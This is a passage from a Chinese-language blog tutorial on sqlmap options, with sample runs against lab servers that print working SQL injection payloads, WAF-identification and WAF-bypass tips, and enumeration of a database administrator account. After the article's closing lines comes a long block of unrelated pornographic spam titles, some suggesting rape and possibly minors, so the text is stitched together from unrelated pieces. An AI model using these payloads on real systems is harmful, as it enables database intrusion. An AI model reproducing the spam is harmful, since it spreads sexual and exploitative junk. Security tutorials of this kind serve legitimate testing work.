    [11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    [11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
    [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.
    <b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
    [11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
    [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.
    <b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
    [11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
    [Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.
    <b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
    [11:12:17] [INFO] target URL appears to have 3 columns in query
    [...]

    其他的一些參數
    使用參數縮寫

    參數:-z

    有使用參數太長太復雜,可以使用縮寫模式。 例如:

    python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"

    可以寫成:

    python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"

    還有:

    python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"

    可以寫成:

    python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"

    成功SQL注入時警告

    參數:--alert
    設定會發的答案

    參數:--answers

    當希望sqlmap提出輸入時,自動輸入自己想要的答案可以使用此參數: 例子:

    $ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--technique=E --answers="extending=N" --batch
    [...]
    [xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
    heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
    [xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N
    [...]

    發現SQL注入時發出蜂鳴聲

    參數:--beep

    發現sql注入時,發出蜂鳴聲。
    啟發式檢測WAF/IPS/IDS保護

    參數:--check-waf

    WAF/IPS/IDS保護可能會對sqlmap造成很大的困擾,如果懷疑目標有此防護的話,可以使用此參數來測試。 sqlmap將會使用一個不存在的參數來注入測試

    例如:

    &foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1

    如果有保護的話可能返回結果會不同。
    清理sqlmap的UDF(s)和表

    參數:--cleanup

    清除sqlmap注入時產生的udf與表。
    禁用彩色輸出

    參數:--disable-coloring

    sqlmap默認彩色輸出,可以使用此參數,禁掉彩色輸出。
    使用指定的Google結果頁面

    參數:--gpage

    默認sqlmap使用前100個URL地址作為注入測試,結合此選項,可以指定頁面的URL測試。
    使用HTTP參數污染

    參數:-hpp

    HTTP參數污染可能會繞過WAF/IPS/IDS保護機制,這個對ASP/IIS與ASP.NET/IIS平臺很有效。
    測試WAF/IPS/IDS保護

    參數:--identify-waf

    sqlmap可以嘗試找出WAF/IPS/IDS保護,方便用戶做出繞過方式。目前大約支持30種產品的識別。

    例如對一個受到ModSecurity WAF保護的MySQL例子:

    $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3
    [...]
    [xx:xx:23] [INFO] testing connection to the target URL
    [xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
    [xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'
    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'
    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'
    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'
    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'
    [xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
    [xx:xx:23] [DEBUG] page not found (404)
    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'
    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'
    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
    [xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')
    [...]

    模仿智能手機

    參數:--mobile

    有時服務端只接收移動端的訪問,此時可以設定一個手機的User-Agent來模仿手機登陸。

    例如:

    $ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
    [...]
    which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
    [1] Apple iPhone 4s (default)
    [2] BlackBerry 9900
    [3] Google Nexus 7
    [4] HP iPAQ 6365
    [5] HTC Sensation
    [6] Nokia N97
    [7] Samsung Galaxy S
    > 1
    [...]

    安全的刪除output目錄的文件

    參數:--purge-output

    有時需要刪除結果文件,而不被恢復,可以使用此參數,原有文件將會被隨機的一些文件覆蓋。

    例如:

    $ python sqlmap.py --purge-output -v 3
    [...]
    [xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...
    [xx:xx:55] [DEBUG] changing file attributes
    [xx:xx:55] [DEBUG] writing random data to files
    [xx:xx:55] [DEBUG] truncating files
    [xx:xx:55] [DEBUG] renaming filenames to random values
    [xx:xx:55] [DEBUG] renaming directory names to random values
    [xx:xx:55] [DEBUG] deleting the whole directory tree
    [...]

    啟發式判斷注入

    參數:--smart

    有時對目標非常多的URL進行測試,為節省時間,只對能夠快速判斷為注入的報錯點進行注入,可以使用此參數。

    例子:

    $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
    [...]
    [xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
    [xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
    [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
    [xx:xx:14] [INFO] skipping GET parameter 'ca'
    [xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
    [xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
    [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
    [xx:xx:14] [INFO] skipping GET parameter 'user'
    [xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
    [xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
    [xx:xx:14] [INFO] GET parameter 'id' is dynamic
    [xx:xx:14] [WARNING] reflective value(s) found and filtering out
    [xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
    [xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
    heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
    do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
    [xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
    [xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
    [xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
    [xx:xx:14] [INFO] testing 'MySQL inline queries'
    [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
    [xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
    [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
    [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
    [xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
    [xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
    [xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    [xx:xx:24] [INFO] target URL appears to have 3 columns in query
    [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
    [...]

    初級用戶向導參數

    參數:--wizard 面向初級用戶的參數,可以一步一步教你如何輸入針對目標注入。

    $ python sqlmap.py --wizard

    ??? sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool

    http://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 11:25:26

    Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1
    POST data (--data) [Enter for None]:
    Injection difficulty (--level/--risk). Please choose:
    [1] Normal (default)
    [2] Medium
    [3] Hard
    > 1
    Enumeration (--banner/--current-user/etc). Please choose:
    [1] Basic (default)
    [2] Smart
    [3] All
    > 1

    sqlmap is running, please wait..

    heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
    do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y
    GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
    sqlmap identified the following injection points with a total of 25 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
    ??? Type: boolean-based blind
    ??? Title: AND boolean-based blind - WHERE or HAVING clause
    ??? Payload: id=1 AND 2986=2986

    ??? Type: error-based
    ??? Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    ??? Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)))

    ??? Type: UNION query
    ??? Title: Generic UNION query (NULL) - 3 columns
    ??? Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)--

    ??? Type: stacked queries
    ??? Title: Microsoft SQL Server/Sybase stacked queries
    ??? Payload: id=1; WAITFOR DELAY '0:0:5'--

    ??? Type: AND/OR time-based blind
    ??? Title: Microsoft SQL Server/Sybase time-based blind
    ??? Payload: id=1 WAITFOR DELAY '0:0:5'--

    ??? Type: inline query
    ??? Title: Microsoft SQL Server/Sybase inline queries
    ??? Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))
    ---
    web server operating system: Windows XP
    web application technology: ASP, Microsoft IIS 5.1
    back-end DBMS operating system: Windows XP Service Pack 2
    back-end DBMS: Microsoft SQL Server 2005
    banner:
    ---
    Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
    ??? Oct 14 2005 00:33:37
    ??? Copyright (c) 1988-2005 Microsoft Corporation
    ??? Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
    ---
    current user:??? 'sa'
    current database:??? 'testdb'
    current user is DBA:??? True

    [*] shutting down at 11:25:52

    總結

    以上是生活随笔為你收集整理的sqlmap工具命令行的含义的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

    午夜嘿嘿嘿影院 | 久久亚洲中文字幕精品一区 | 日本一卡2卡3卡4卡无卡免费网站 国产一区二区三区影院 | 欧美阿v高清资源不卡在线播放 | 人妻有码中文字幕在线 | 人妻与老人中文字幕 | 老头边吃奶边弄进去呻吟 | 午夜精品一区二区三区在线观看 | 亚洲色偷偷偷综合网 | 国产香蕉尹人综合在线观看 | 国产69精品久久久久app下载 | 精品厕所偷拍各类美女tp嘘嘘 | 性欧美熟妇videofreesex | 久久亚洲国产成人精品性色 | 一区二区三区乱码在线 | 欧洲 | 免费人成在线观看网站 | 伊在人天堂亚洲香蕉精品区 | 97夜夜澡人人双人人人喊 | 丰满肥臀大屁股熟妇激情视频 | 午夜理论片yy44880影院 | 成人无码精品一区二区三区 | 免费无码一区二区三区蜜桃大 | 丰满少妇高潮惨叫视频 | 麻豆精品国产精华精华液好用吗 | 无套内谢的新婚少妇国语播放 | 欧美老人巨大xxxx做受 | 日日干夜夜干 | 久久久国产精品无码免费专区 | 大乳丰满人妻中文字幕日本 | 99久久精品无码一区二区毛片 | 蜜桃视频插满18在线观看 | 亚洲熟妇色xxxxx欧美老妇y | 97久久国产亚洲精品超碰热 | 久久久久久久人妻无码中文字幕爆 | 国模大胆一区二区三区 | 国产在线精品一区二区高清不卡 | 亚洲经典千人经典日产 | 久久精品中文闷骚内射 | 99久久久无码国产aaa精品 | 无码乱肉视频免费大全合集 | 中文无码精品a∨在线观看不卡 | 中国女人内谢69xxxx | 国产亚洲精品久久久久久大师 | 国产亚洲美女精品久久久2020 | 俺去俺来也在线www色官网 | 国产成人综合美国十次 | 伊人久久大香线蕉av一区二区 | 18精品久久久无码午夜福利 | 无码吃奶揉捏奶头高潮视频 | 波多野结衣av在线观看 | 日韩av激情在线观看 | 男女下面进入的视频免费午夜 | 欧美激情综合亚洲一二区 | 精品国产一区二区三区av 性色 | 久久99久久99精品中文字幕 | 漂亮人妻洗澡被公强 日日躁 | 成 人 网 站国产免费观看 | 精品久久久久久人妻无码中文字幕 | 丰满诱人的人妻3 | 欧美人妻一区二区三区 | 激情内射亚州一区二区三区爱妻 | 白嫩日本少妇做爰 | 欧美 日韩 亚洲 在线 | 欧美性生交活xxxxxdddd | 人妻天天爽夜夜爽一区二区 | 亚洲自偷精品视频自拍 | 亚洲日韩乱码中文无码蜜桃臀网站 | 日本一区二区三区免费播放 | 久久无码中文字幕免费影院蜜桃 | 国产美女精品一区二区三区 | 老司机亚洲精品影院 | 欧美黑人性暴力猛交喷水 | 东京热无码av男人的天堂 | 国产一区二区三区影院 | 亚洲精品久久久久中文第一幕 | 日本欧美一区二区三区乱码 | 99久久人妻精品免费一区 | 精品久久久久香蕉网 | 红桃av一区二区三区在线无码av | 蜜桃视频插满18在线观看 | 亚洲国产欧美在线成人 | 性啪啪chinese东北女人 | 色狠狠av一区二区三区 | 欧美三级a做爰在线观看 | 丰满人妻翻云覆雨呻吟视频 | 国产亚洲欧美日韩亚洲中文色 | 国产精品99爱免费视频 | 久久久精品成人免费观看 | 色一情一乱一伦一视频免费看 | 一本色道婷婷久久欧美 | 18精品久久久无码午夜福利 | 日本va欧美va欧美va精品 | 奇米影视888欧美在线观看 | 日日鲁鲁鲁夜夜爽爽狠狠 | 内射巨臀欧美在线视频 | 国产香蕉97碰碰久久人人 | 欧美国产日韩久久mv | 四虎4hu永久免费 | 精品无人国产偷自产在线 | 国产精品久久精品三级 | 日韩亚洲欧美精品综合 | 野外少妇愉情中文字幕 | 捆绑白丝粉色jk震动捧喷白浆 | a在线亚洲男人的天堂 | 97久久超碰中文字幕 | 亚洲欧美色中文字幕在线 | a在线亚洲男人的天堂 | 麻豆国产人妻欲求不满 | 色窝窝无码一区二区三区色欲 | 亚洲阿v天堂在线 | 日日干夜夜干 | 亚洲成在人网站无码天堂 | 精品欧洲av无码一区二区三区 | 丰满肥臀大屁股熟妇激情视频 | 国产精品a成v人在线播放 | 奇米综合四色77777久久 东京无码熟妇人妻av在线网址 | 中文字幕av伊人av无码av | 桃花色综合影院 | 亚洲va欧美va天堂v国产综合 | 大色综合色综合网站 | 亚洲伊人久久精品影院 | 无套内谢的新婚少妇国语播放 | 日本一区二区更新不卡 | 久久久精品人妻久久影视 | 色欲人妻aaaaaaa无码 | 丰满少妇熟乱xxxxx视频 | 色欲av亚洲一区无码少妇 | 精品成在人线av无码免费看 | 国产成人久久精品流白浆 | 2019nv天堂香蕉在线观看 | 撕开奶罩揉吮奶头视频 | 国产午夜亚洲精品不卡 | 国产精品国产三级国产专播 | 极品尤物被啪到呻吟喷水 | 免费乱码人妻系列无码专区 | 日韩欧美中文字幕公布 | 一本久道久久综合婷婷五月 | 18禁止看的免费污网站 | 欧美日韩在线亚洲综合国产人 | 在线观看国产午夜福利片 | 人人爽人人澡人人人妻 | 国产精品亚洲а∨无码播放麻豆 | 亚洲阿v天堂在线 | 久久久亚洲欧洲日产国码αv | 亚洲精品www久久久 | 十八禁真人啪啪免费网站 | 无码人妻丰满熟妇区五十路百度 | 伊人久久婷婷五月综合97色 | 99久久人妻精品免费一区 | 无码人妻出轨黑人中文字幕 | 18无码粉嫩小泬无套在线观看 | 亚洲中文字幕在线观看 | 国内精品一区二区三区不卡 | 亚洲一区二区三区国产精华液 | 蜜臀av无码人妻精品 | 国产午夜福利100集发布 | 欧美国产日产一区二区 | 亚洲成a人片在线观看无码 | 成年美女黄网站色大免费全看 | 男人扒开女人内裤强吻桶进去 | 国产肉丝袜在线观看 | 亚洲精品国偷拍自产在线观看蜜桃 | 日韩欧美成人免费观看 | 国产精品人妻一区二区三区四 | 色噜噜亚洲男人的天堂 | 西西人体www44rt大胆高清 | 任你躁在线精品免费 | 波多野结衣乳巨码无在线观看 | 久久国产精品二国产精品 | 沈阳熟女露脸对白视频 | 激情五月综合色婷婷一区二区 | 欧美性猛交内射兽交老熟妇 | 国精产品一品二品国精品69xx | 精品人妻人人做人人爽夜夜爽 | 性欧美熟妇videofreesex | 欧美变态另类xxxx | 亚洲成av人综合在线观看 | 老司机亚洲精品影院无码 | 国产精品第一区揄拍无码 | 色五月丁香五月综合五月 | 人妻少妇精品无码专区动漫 | 老司机亚洲精品影院无码 | 日韩无套无码精品 | 国产一区二区不卡老阿姨 | 国产性生交xxxxx无码 | 人妻少妇精品无码专区二区 | 亚洲 激情 小说 另类 欧美 | 无遮挡啪啪摇乳动态图 | 国产精品亚洲专区无码不卡 | 国产精品成人av在线观看 | 在线欧美精品一区二区三区 | 亚洲日韩av一区二区三区四区 | 欧美成人高清在线播放 | 自拍偷自拍亚洲精品10p | 久久精品视频在线看15 | 玩弄中年熟妇正在播放 | 午夜福利试看120秒体验区 | 蜜臀av在线观看 在线欧美精品一区二区三区 | 亚洲大尺度无码无码专区 | 亚洲精品中文字幕 | 亚洲中文字幕va福利 | 人妻中文无码久热丝袜 | 久久熟妇人妻午夜寂寞影院 | 日韩精品久久久肉伦网站 | 内射后入在线观看一区 | 色婷婷综合中文久久一本 | 欧美丰满老熟妇xxxxx性 | 久久精品成人欧美大片 | 国产成人无码av片在线观看不卡 | 久久99精品久久久久久 | 亚洲成av人片天堂网无码】 | 一个人看的视频www在线 | 国产网红无码精品视频 | 久久97精品久久久久久久不卡 | 中文字幕日韩精品一区二区三区 | 国产熟妇高潮叫床视频播放 | 鲁一鲁av2019在线 | 国产又爽又猛又粗的视频a片 | 欧美三级a做爰在线观看 | 精品国产福利一区二区 | 高潮毛片无遮挡高清免费视频 | 日本大乳高潮视频在线观看 | 久久久精品人妻久久影视 | 中文字幕人妻无码一夲道 | 1000部夫妻午夜免费 | 中文字幕日产无线码一区 | 丰满人妻翻云覆雨呻吟视频 | 日本精品高清一区二区 | 熟妇人妻中文av无码 | 国产综合色产在线精品 | 爆乳一区二区三区无码 | 天天综合网天天综合色 | 久久久久久国产精品无码下载 | 欧美日韩一区二区免费视频 | 久久久精品456亚洲影院 | 天堂无码人妻精品一区二区三区 | 日日天干夜夜狠狠爱 | 暴力强奷在线播放无码 | 欧美丰满熟妇xxxx性ppx人交 | 亚洲国产精华液网站w | 欧美日韩一区二区三区自拍 | 波多野结衣一区二区三区av免费 | 2020久久超碰国产精品最新 | 国产精品高潮呻吟av久久 | 久久久中文字幕日本无吗 | 亚洲成a人片在线观看无码3d | 天干天干啦夜天干天2017 | 中文字幕无码乱人伦 | 免费无码的av片在线观看 | 国产综合久久久久鬼色 | 国产网红无码精品视频 | 国产人妖乱国产精品人妖 | 日本肉体xxxx裸交 | 伊人色综合久久天天小片 | 丰满岳乱妇在线观看中字无码 | 亚洲国产日韩a在线播放 | 男女爱爱好爽视频免费看 | 久久久久国色av免费观看性色 | 乱码午夜-极国产极内射 | 国产农村乱对白刺激视频 | 久久久久成人精品免费播放动漫 | 99麻豆久久久国产精品免费 | 人妻互换免费中文字幕 | 99精品无人区乱码1区2区3区 | 久久精品人人做人人综合试看 | 国产精品欧美成人 | 国产麻豆精品精东影业av网站 | 久久精品视频在线看15 | 亚洲日韩av一区二区三区四区 | 亚洲一区二区三区四区 | 国产精品资源一区二区 | 狠狠噜狠狠狠狠丁香五月 | 无码人妻av免费一区二区三区 | 亲嘴扒胸摸屁股激烈网站 | 性色欲网站人妻丰满中文久久不卡 | 亚洲欧洲无卡二区视頻 | 性欧美熟妇videofreesex | 国内精品久久毛片一区二区 | 成 人 网 站国产免费观看 | 欧美日韩一区二区免费视频 | 男人的天堂2018无码 | 国产99久久精品一区二区 | 亚洲一区av无码专区在线观看 | 少妇人妻av毛片在线看 | 亚洲精品久久久久久久久久久 | 久久久精品456亚洲影院 | 色情久久久av熟女人妻网站 | 欧美性猛交xxxx富婆 | 99精品国产综合久久久久五月天 | 亚洲性无码av中文字幕 | 国产极品美女高潮无套在线观看 | 国产性生交xxxxx无码 | 日韩亚洲欧美中文高清在线 | 在教室伦流澡到高潮hnp视频 | 久久综合香蕉国产蜜臀av | 天堂亚洲免费视频 | 欧美 亚洲 国产 另类 | 撕开奶罩揉吮奶头视频 | 亚洲人成人无码网www国产 | 一个人看的视频www在线 | 综合网日日天干夜夜久久 | 国产亚洲人成a在线v网站 | 激情综合激情五月俺也去 | 中文字幕无码av激情不卡 | 亚洲国产午夜精品理论片 | 中文字幕无码热在线视频 | 无码人妻丰满熟妇区五十路百度 | 日欧一片内射va在线影院 | 午夜精品一区二区三区在线观看 | 亚洲熟妇色xxxxx欧美老妇y | 一区二区三区乱码在线 | 欧洲 | 日本精品少妇一区二区三区 | 色欲综合久久中文字幕网 | 性生交片免费无码看人 | 麻花豆传媒剧国产免费mv在线 | 国产熟女一区二区三区四区五区 | 国产精品办公室沙发 | 99精品无人区乱码1区2区3区 | 久久久久久久女国产乱让韩 | 中国女人内谢69xxxxxa片 | 无码毛片视频一区二区本码 | 日本一卡2卡3卡四卡精品网站 | 亚洲精品中文字幕 | 兔费看少妇性l交大片免费 | 一本大道伊人av久久综合 | 日本精品少妇一区二区三区 | 亚洲精品国产品国语在线观看 | 亚洲精品一区三区三区在线观看 | 久久久久99精品成人片 | 无套内射视频囯产 | 在线 国产 欧美 亚洲 天堂 | 色窝窝无码一区二区三区色欲 | 欧美人与牲动交xxxx | 呦交小u女精品视频 | 一本久久a久久精品亚洲 | 亚洲精品一区二区三区婷婷月 | 性色欲情网站iwww九文堂 | 少妇高潮一区二区三区99 | 国产精品办公室沙发 | 2020最新国产自产精品 | 77777熟女视频在线观看 а天堂中文在线官网 | 狠狠亚洲超碰狼人久久 | 99riav国产精品视频 | 亚洲欧洲中文日韩av乱码 | 成人免费无码大片a毛片 | 内射巨臀欧美在线视频 | 无码帝国www无码专区色综合 | 色五月五月丁香亚洲综合网 | 久久久久久久女国产乱让韩 | 国产色xx群视频射精 | 精品国偷自产在线 | 免费国产成人高清在线观看网站 | 色窝窝无码一区二区三区色欲 | 亚无码乱人伦一区二区 | 色综合久久中文娱乐网 | 人妻插b视频一区二区三区 | 狠狠色噜噜狠狠狠7777奇米 | 国产真人无遮挡作爱免费视频 | 国产特级毛片aaaaaaa高清 | 国产亚洲精品久久久久久久 | 日韩 欧美 动漫 国产 制服 | aⅴ在线视频男人的天堂 | 亚洲区小说区激情区图片区 | 国产精品.xx视频.xxtv | 久久久久久av无码免费看大片 | 老熟妇乱子伦牲交视频 | 无套内谢的新婚少妇国语播放 | 亚洲中文字幕在线观看 | 亚洲精品一区二区三区在线 | 丁香花在线影院观看在线播放 | 麻豆成人精品国产免费 | 伊人色综合久久天天小片 | 狂野欧美性猛xxxx乱大交 | 欧美亚洲国产一区二区三区 | 亚洲国精产品一二二线 | 在线a亚洲视频播放在线观看 | 国产欧美亚洲精品a | 国产又爽又黄又刺激的视频 | 激情五月综合色婷婷一区二区 | 久久99热只有频精品8 | 日日橹狠狠爱欧美视频 | 亚洲精品久久久久久久久久久 | 欧美日本精品一区二区三区 | 女人和拘做爰正片视频 | 四虎永久在线精品免费网址 | 亚洲成a人片在线观看日本 | 亚洲国产高清在线观看视频 | 九九综合va免费看 | 噜噜噜亚洲色成人网站 | 亚洲精品国产精品乱码视色 | 亚洲人成影院在线无码按摩店 | 丰满护士巨好爽好大乳 | 小鲜肉自慰网站xnxx | 国产精品亚洲五月天高清 | 亚洲国产精品久久久久久 | 亚洲一区二区三区播放 | 俄罗斯老熟妇色xxxx | 四虎永久在线精品免费网址 | 动漫av网站免费观看 | 国产成人综合在线女婷五月99播放 | 中文字幕日产无线码一区 | 国产免费久久精品国产传媒 | 国产绳艺sm调教室论坛 | 欧美午夜特黄aaaaaa片 | 对白脏话肉麻粗话av | 麻花豆传媒剧国产免费mv在线 | 黄网在线观看免费网站 | 久久综合久久自在自线精品自 | 国产精品久久久一区二区三区 | 中文无码伦av中文字幕 | 日本一卡2卡3卡4卡无卡免费网站 国产一区二区三区影院 | 亚洲国产精品久久人人爱 | 久久精品99久久香蕉国产色戒 | 欧美变态另类xxxx | 红桃av一区二区三区在线无码av | 一个人看的www免费视频在线观看 | 国产色在线 | 国产 | 亚洲一区二区三区无码久久 | 久久精品国产99精品亚洲 | 亚洲精品国偷拍自产在线麻豆 | 亚洲男人av香蕉爽爽爽爽 | 99久久精品午夜一区二区 | 欧美 亚洲 国产 另类 | 在线观看免费人成视频 | 国产另类ts人妖一区二区 | 无码人妻出轨黑人中文字幕 | 久久精品女人天堂av免费观看 | 在线精品亚洲一区二区 | 天下第一社区视频www日本 | 蜜桃臀无码内射一区二区三区 | 国产成人久久精品流白浆 | 男人扒开女人内裤强吻桶进去 | 欧美亚洲国产一区二区三区 | 少妇一晚三次一区二区三区 | 亚洲 激情 小说 另类 欧美 | 丝袜美腿亚洲一区二区 | 永久黄网站色视频免费直播 | 色婷婷综合中文久久一本 | 内射爽无广熟女亚洲 | 成在人线av无码免费 | 无码av免费一区二区三区试看 | 狠狠色丁香久久婷婷综合五月 | 两性色午夜视频免费播放 | 丁香花在线影院观看在线播放 | 乱中年女人伦av三区 | 久久久久人妻一区精品色欧美 | 任你躁国产自任一区二区三区 | 欧美丰满少妇xxxx性 | 亚洲国产精品成人久久蜜臀 | 男女猛烈xx00免费视频试看 | 亚洲第一网站男人都懂 | 国产成人人人97超碰超爽8 | 日韩av无码中文无码电影 | 色老头在线一区二区三区 | 精品无人区无码乱码毛片国产 | 5858s亚洲色大成网站www | 成年女人永久免费看片 | 一本色道久久综合亚洲精品不卡 | 国产精品香蕉在线观看 | 日本xxxx色视频在线观看免费 | 性生交片免费无码看人 | 久久国产36精品色熟妇 | 国产亲子乱弄免费视频 | 久久无码中文字幕免费影院蜜桃 | 日韩精品乱码av一区二区 | 一本无码人妻在中文字幕免费 | 少妇厨房愉情理9仑片视频 | 国产97色在线 | 免 | 精品日本一区二区三区在线观看 | 内射欧美老妇wbb | 午夜性刺激在线视频免费 | 国产手机在线αⅴ片无码观看 | 十八禁视频网站在线观看 | 人人妻人人澡人人爽欧美一区 | 女人被爽到呻吟gif动态图视看 | 性欧美牲交xxxxx视频 | 亚洲区欧美区综合区自拍区 | 亚拍精品一区二区三区探花 | 国产精品久久久久无码av色戒 | 国产莉萝无码av在线播放 | 国产精品高潮呻吟av久久4虎 | 欧美精品一区二区精品久久 | 色婷婷香蕉在线一区二区 | 国产成人无码av片在线观看不卡 | 